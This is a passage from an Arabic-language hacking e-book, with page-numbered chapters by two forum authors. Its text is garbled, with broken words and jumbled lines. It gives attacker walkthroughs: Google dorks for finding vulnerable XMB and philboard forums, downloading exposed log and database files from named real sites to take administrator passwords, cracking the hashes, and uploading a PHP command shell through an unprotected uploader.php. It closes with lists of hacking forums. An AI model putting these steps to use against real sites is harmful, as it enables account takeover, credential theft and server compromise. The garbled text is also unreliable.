ServerAdmin [email]webmaster@NIGHTMARE.<strong>com</strong>[/email]<br />
DocumentRoot /home/NIGHTMARE/public_html<br />
BytesLog domlogs/NIGHTMARE.<strong>com</strong>-bytes_log<br />
User NIGHTMARE<br />
Group NIGHTMARE<br />
ServerName w<br />
ww.NIGHTMARE.<strong>com</strong><br />
CustomLog domlogs/NIGHTMARE<strong>com</strong> <strong>com</strong>bined<br />
ScriptAlias /cgi-bin/ /home/NIGHTMARE/public_html/cgi-bin<br />
اذالم یب قلك شئ اتكل علىاالله<br />
وفكالتشفیر<br />
شغلالا فتيبي وامسحالموقع وحطالاندكس<br />
والسلام ختاام...<br />
٢٤٩
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
ثغرة في نوع<br />
XMB من المنتدیات<br />
"<br />
$$$$$$$$$$$$$$$$<br />
الكاتب: MaXhAk2000<br />
$$$$$$$$$$$$$$$$<br />
السلام علیكم ورحمةاالله وبركاته،،،<br />
اما بعد ((((((( فأناابرئ ذمتي مناياستخدام خاطئلهذهالغره ضداخواننا العرب،واالله على مااقول<br />
شهید))))))...<br />
بسماالله نبدأ،،،<br />
تعتبر المنتدیات من نوع xmb من المنتدیات التياكتسبت شهره واسعهفي مجالها وحالها حالالكثیر من<br />
الأنوا عالأخر ى من المنتدیات من وجود الثغرات والأختراقاتفلا یوجد شيءكامل على وجهالأر ضالااالله<br />
عز وجل..<br />
وص فللثغره::<br />
وقدتم اكتشا فثغره جدیدهفي هذاالنو ع من المنتدیات مما یمكنكانتكونالمدیر علىالمنتد ىاوتكون<br />
مشر فاوياي عضواخر<br />
الأصدارالمصاب:::<br />
XMB 1.6 Magic Lantern Final<br />
الشرح والتطبی ق:::<br />
جا وقت ال شغل والجد >>>سوفاقوم بتقسیم الدرس على خطوات حتى یفهم ویكوناوووضح وأسهل :<br />
http://www.google.<strong>com</strong>/<br />
7-<br />
- 1علیكبالذهابالى موقع جوجل<br />
-2اكتبفي منطقةالب حثFinal XMB 1.6 Magic Lantern<br />
-3سو فترى منتدیاتكثییییییییره اكثرها مصابهبهذهالثغرهلكن رجاااء<br />
لاتقرب المنتدیاتالعربیة وعلیك بتحذیرها منالثغرهالموجوده.<br />
-4اضغط علىاي منتد ى وقم بكتابةالكلمة التالیة بعد عنوانالمنتدى<br />
index_log.logیعني راح یكون زيكده<br />
http://www.******.<strong>com</strong>/massegboard/index_log.log<br />
-5 راح ینزل عندك مل ف والمل ف عباره عن مل ف زيالكوكیزكبیر وفیهاسماء<br />
المستخدمین والباسورد وأشیاءثانیه ماتهمنا.<br />
- 6الأن علیكبالبحثفيالمنتدى عناسمالمدیر وذلكبالذهابالىالمواضیع<br />
وتشو فالأسماء واليتلقىتح تاسمهادمن ستریتورانسخاسمه.<br />
افتحالمل فالي نزلته من الموقع وسويب حث عناسمالمدیر راح یجیك زي<br />
كده مثلا::<br />
xmbuser=admin<br />
واباس را حتلقاهقدامه زيكده<br />
xmbpw=1faeb6747a31c854800ddf3c62b1717a<br />
-8 طبعاالباسفي هذهالحاله مشفر وفكالتشفیرصعبلهذا الغر ضقامت شركة<br />
٢٥٠
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
CCI بتصمیمبرنامج یقومبهذا الغر ض وهذهوصلتالبرنامج<br />
ftp://www.cafecounterintelligence.<strong>com</strong>/cci/chigger.exe<br />
-9اعدادتالبرنامج كتاليفيالصورة :<br />
رقم( <strong>١</strong>)قمبوضع علامة صح.<br />
رقم(٢)قمبوضعاسم العضو سواء مدیراو غیره<br />
رقم( ٣)قمبوضعالباس المشفر حقالعضواوالمدیراو غیره<br />
رقم (4)قمبوضع علامة صح.<br />
رقم( ٥)قمبوضعالبروكسي اليتریدهاوالبروكسي حقمزوده الخدمه حقك<br />
رقم( ٦)قمبوضعالمنفذ حقالبروكسي<br />
-10 بقي شيء واحد بعد اتمام الأعدادات حقت البرنامج بقيانتذهبالى<br />
المتصفحانترنتاكسبلورر
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
شرح ثغرة<br />
" philboard<br />
"<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$$$$$$$<br />
Hi_HaCkEr<br />
$$$$$$$$$$$$$$<br />
الكاتب:<br />
سأذكراحدالثغراتفي بع ضاللغاتالدینامیكیة ( asp) active server pages<br />
طبعا هذهاللغة وللأ س فبهاثغرات عدیدة و خصوصافيالتعامل معقواعدبیاناتها<br />
.<br />
بشكل مختصر هذه اللغةتعتبر منلغات البرمجةالدینامیكیة التفاعلیةلبرمجة مواقعالانترنت ولها میزة<br />
بأن الكودلها مخفي<br />
وتعتمدقواعدبیاناتها علىثلاثةأنوا عهي<br />
:<br />
sqlserver && sql && M.S Access<br />
واماقاعدةبیانات ما یكروسوفتأكسسفثغراتها منأبس طالثغراتب حی ث انكاذا وجد تامتدادا واسم<br />
قاعدةالباناتفقطفانكتستطیعتحمیلها على جهازك مباشرة وتصفح جمیعالباسوردا تبسهولة ویسر<br />
وبدونتشفیرأیضا .<br />
والیكمالمثال منأحد المنتدیاتالتي تتضح جلیهبها هذهالثغرة وهيباسم philboard.asp<br />
مثل هذا المنتد ى http://www.khill.co.uk/forum/philboard.asp<br />
وطریقةایجاد مثل هذاالنو ع منتدیا تاذهبالى جوجلكما ذكرنا سابقا واب حث عن<br />
philboardوانتظر النتائج....<br />
> --------------<br />
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br />
كی فتحملقاعدةالبیانا ت ؟<br />
اكتب هذاالامتداد<br />
وبعد ذلك حاولان یكونالمنتد ىبه عدیدقلیل منالمواضیع حتى یكون حجمقاعدةالبیانات صغیر جدا<br />
للتطبیق والتسلیمبسرعة<br />
وهذا هوامتداد واسمقاعدةالبیاناتلقاعدةالبیانات<br />
database/philboard.mdb<br />
وتكتبه بعداسمالموقع والمنتد ى مثل<br />
http://www.khill.co.uk/forum/database/philboard.mdb<br />
ولابدلكيتقراقاعدةالبیانا تان یكونفي جهازكبرنامج ما یكروسوفتأكسس<br />
وبعد فتحقاعدةالبیانات ستجدبداخلها عدة جداولفیعا جمیع محتویاتقاعدةالبیانات<br />
من ضمنها وهوالمهم جدولالمستخدمینال users<br />
٢٥٢
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
وستجداولاسم عالبا هو admin وهو اسمالمدیر العام معالباسوورد<br />
والحللهذهالثغرة /هوتغییر مسارقواعدالبیاناتلكل منتد ى .فكما رایناان منتدیات philboard.asp<br />
قواعدبیاناتها جمیعالها نفسالاسم والامتداد.....<br />
٢٥٣
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
"<br />
شرح ثغرة uploader.php<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
$$$$$$$$$$$$$$<br />
الكاتب Hi_HaCkEr:<br />
$$$$$$$$$$$$$$<br />
هيثغرةفيبرنامج uploader.php وهو متوفرباصدارة <strong>١</strong>٫<strong>١</strong> وتسمحلكبرفعاي مل فاوحتى<br />
سكربتا ت php<br />
وتستطیعتحمیله من http://www.phpscriptcenter.<strong>com</strong>/uploader.php<br />
الاسكربت مناسمهیتضحبانهیعطیك میزة رفع ملفاتلموقعك مباشرةلكن ((بوجودباسورد ))<br />
طیباذالم یكن محمى بباسوورداذاالسیرفركله سیصبحتح ت سیطرتكاذالم یكنفي حالة<br />
safe_modeامااذاكان سی ف مودفالموقعفقط سیصبحتح ت سیطرتك<br />
اذا حملت الملفلموقعكفقم بتغییر الباسووردوتستطیع عمل ذلك من مل ف setup.php<br />
openافتح setup.php and edit these options المل ف واستعر ض هذا الاعدادات<br />
--------------------------------------------------------------------------------------<br />
$ADMIN[RequirePass] = "Yes"; // Checks to see if upload has a vaild<br />
password<br />
$ADMIN[Password] = "password"; // This is the password if the above<br />
قم بتغییر الباسوورد منهنااا<br />
option is Yes<br />
$ADMIN[UploadNum] = "5"; // Number of upload feilds to put on the<br />
htmlعددالملفات<br />
page<br />
$ADMIN[directory] = "uploads"; // The directory the files will be<br />
(777 uploadedاسم to (must be chmoded to مجلد المل ف اتركهكماهواو غیرهفلك<br />
الخیار<br />
----------------------------------------------------------------------------------------<br />
طبعاانلم یكنالملف محمي بباسوورد فتستطیعتحمیلاي مل ف وسیكونبداخل<br />
فاذا رفعنها مثلا هذاالاسكربت<br />
مجلدuploads<br />
<br />
سنصللل cmd ونستطیعتنفیذاوامر علىالسیرفر ...... etc<br />
فاذا نفذنا<br />
٢٥٤
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
http://www.victim.<strong>com</strong>/uploads/shellemul.php?cmd=id<br />
سیكون الناتج مثلا<br />
uid=21(apache) gid=21(apache) groups=21(apache)<br />
طبعا هذا سكرب تبسی ط ولمزید منالرفاهیةارفع سكربتالشلاواي سكربت مماثلله واستمتع (انلم<br />
یكنالسیرفرفي حالة سی ف مود (<br />
طریقةالب حث عن هذه الثغرة<br />
ابحثفي جوجل متبعا هذهالطریقة<br />
allinurl: uploader.php<br />
وستر ى النتائج<br />
وختاما اتمنىان یكون الموضو ع مفیداللجمیع.........<br />
٢٥٥
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
أفضل المنتدیات العربیة للهاكر<br />
"<br />
$$$$$$$$$$$$$$$$<br />
الكاتب MaXhAk2000:<br />
$$$$$$$$$$$$$$$$<br />
أقدلكمأفضل المواقع والمنتدیاتالعربیةفي مجالالهاكبجمیع مجالته على حدمعرفتي:::<br />
.<strong>١</strong><br />
.٢<br />
.٣<br />
.٤<br />
.٥<br />
.٦<br />
.٧<br />
.٨<br />
.٩<br />
.<strong>١</strong>٠<br />
منتدیات العاصفة منظمة هاي هكر<br />
منتد ى شبكةالحزمالإ سلامیة.<br />
منتد ىابن مصر.<br />
منتد ىالعقربالأحمر http://www.redstaing.ocm<br />
منتدىإعصار.<br />
منتد ىمعتز ن ت.<br />
منتد ىهاكرفلسطین.<br />
موقع<br />
منتد ى نجم دوس. http://www.naajm.<strong>com</strong>/<strong>vb</strong><br />
منتدىامبراطوریةالعرب<br />
http://<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong> (<br />
)<br />
http://www.7azm.net/<strong>vb</strong>/<br />
http://www.ebnmasr.net/<strong>vb</strong>/<br />
http://www.e3sar.<strong>com</strong>/<strong>vb</strong>/<br />
http://www.emoataz.<strong>com</strong>/<strong>vb</strong>/<br />
http://www.h4palestine.<strong>com</strong>/<br />
http://www.pharaonics.net/<br />
http://www.arabse.net/forums/<br />
هذه افضل مارأیتهوتصفحته عن المواقعالعربیة التيتدعم علم الهاك...<br />
٢٥٦
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
أفضل مواقع الأمن والهاك الإنجلیزیة<br />
"<br />
$$$$$$$$$$$$$$$$<br />
الكاتب MaXhAk2000:<br />
$$$$$$$$$$$$$$$$<br />
هذه بع ض المواقع المهمةالتي یستخدمهاالهكرلمعرفةاخر الثغراتالصادره مع مقالا تبسیطلهذه<br />
المواقع<br />
موقعSecurity Packet Storm<br />
----------------------<br />
العنوان : http://packetstorm.securify.<strong>com</strong>/<br />
واحد مناكبرقواعد البیاناتالتيتحمل كعلومات متعلقةبالأمن<br />
انا افضل الذهابالى هذاالموقع مرهفيالیوملقراءةقسم Today' 'New Files سواءاللب حث عن<br />
ثغراتمعینهاولأ.<br />
اوجد الارشی ف عن طریق Ken Williams حیثان هذاالموقع یستهلك مئاتالالو ف منالنقراتكل<br />
اسبو ع<br />
حالیاانتقلت ملكیتهالى مالك ) Kroll-O-Nagra (.http://www.securify.<strong>com</strong>/<br />
موقعFocus Security<br />
----------------<br />
العنوان : http://www.securityfocus.<strong>com</strong>/<br />
قاعدةبیاناتاخر ىكاملة . تتحد ث یومیافهؤلاء الشبابالقائمون على هذا الموقع لا ینامونابدا!<br />
BugTraq<br />
--------<br />
: مستضیفه موقع( http://www.securityfocus.<strong>com</strong>/ Security Focus ),وسابقا<br />
كان مستضیفة ) (Netspace .(http://www.netspace.org/<br />
العنوان<br />
BugTraqواحدة منافضلقائمة المراسلات البریدیة mailing list التي تتهتمبالامنالالكتروني<br />
هذه القائمة یقوم علیها رئی ساسمه (aleph1@underground.org). Aleph1یستقبل الرسائل<br />
التيترسلها ( عنثغرةمعینه مثلا ( ویقوم بت حلیلهاوتنضیفها منال spamsوالرسائلالتيلیسلها<br />
فائدةاو الثغرات القدیمةثم یقومبإرسال الرسالهالممتازهفق ط الى جمیعالمشتركینفي القائمة<br />
انص حكبالتسجیل<br />
تستطیعایضاالبحثفيارشیفاتهاالتيتعتبرلدي منافضلقواعدالبیانات وذلك عن طریق دخول الموقع<br />
ثم الب حث عن رابط'search'<br />
http://www.securityfocus.<strong>com</strong>/<br />
الب حثSearching<br />
------------<br />
اذاكنتترید الب حث عنثغرة متعلقةبخدمهمعینة مثلا Sendmailفستحتاجلكتابت 8.8.3<br />
local DoS حث عنثغرهمعینه مثلا هجوم حجب الخدمه sendmail'واذااردتالب '8.8.3<br />
نسخه<br />
فما علیكالا كتابتالتالي sendmail' 'local DoS :بدون علامات<br />
ضداي<br />
الاقتباس .<br />
من sendmail<br />
وهذه بع ض المواقعالاخرى:::<br />
٢٥٧
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
http://rootshell.redi.tk/<br />
موقع http://www.ussrback.<strong>com</strong><br />
http://www.insecure.org/sploits.html<br />
http://www.linux.<strong>com</strong>.cn/hack.co.za<br />
موقع<br />
موقع<br />
موقع<br />
.<strong>١</strong><br />
.٢<br />
.٣<br />
.٤<br />
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=<br />
=<br />
أمابالنسبةلمواقع الهاكالإنجلیزیةفمعرفتيبها ضئیلة لعدمتوسعيفي اللغةالإنجلیزیة، وهذه المواقع<br />
كالتالي:::<br />
موقع<br />
موقع<br />
موقع<br />
http://www.haker.<strong>com</strong>.pl<br />
http://www.webattack.<strong>com</strong>/<br />
http://blacksun.box.sk<br />
موقع http://www.blackcode.<strong>com</strong><br />
.<strong>١</strong><br />
.٢<br />
.٣<br />
.٤<br />
...<br />
٢٥٨
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
الخاتمة<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
نحمداالله ونشكره علىان وفقنا لإتمام هذاالكتاب والذي لانرجوا من وراءهالاالخیر والثواب<br />
فلاتنسونا من دعوةفي ظهرالغیبلنا ولإ خوانناالمسلمینفيكل مكان.<br />
لكن ننوه هنا اللا شيءقد یقول البع ض هذاالكتاب لا یحتوي على شرو حللثغرات ومن هذاالقابیل<br />
لكن نقول ن حنأنه یجبفيالبدایةالتأسیس ومنثم ینطلق الشخ صفي هذا العلم الذي لا ینتهى<br />
ویفقه نفسهبنفسه،، وأیضاأنالثغراتلها وقت محددوت نتهي ویتمترقیعالكن شرحنا بعضها منأجلباب<br />
العلمبالشيء وللإ ستفادة لا غیر...<br />
هذا وصلىاالله على النبي الختار محمدابن عبداالله عدد ماتراكمتالسحب وعدد ماتزاخرتالنجوم<br />
والسلام علیكم ورحمةاالله وبركاته،،،<br />
...<br />
++++++++++++++++++++++++<br />
+<br />
+ Hi_hacker@hotmail.<strong>com</strong><br />
+ Maxhak2000@hotmail.<strong>com</strong><br />
++++++++++++++++++++++++<br />
أياستفسارأو نصیحهیرجى مراسلة:-<br />
٢٥٩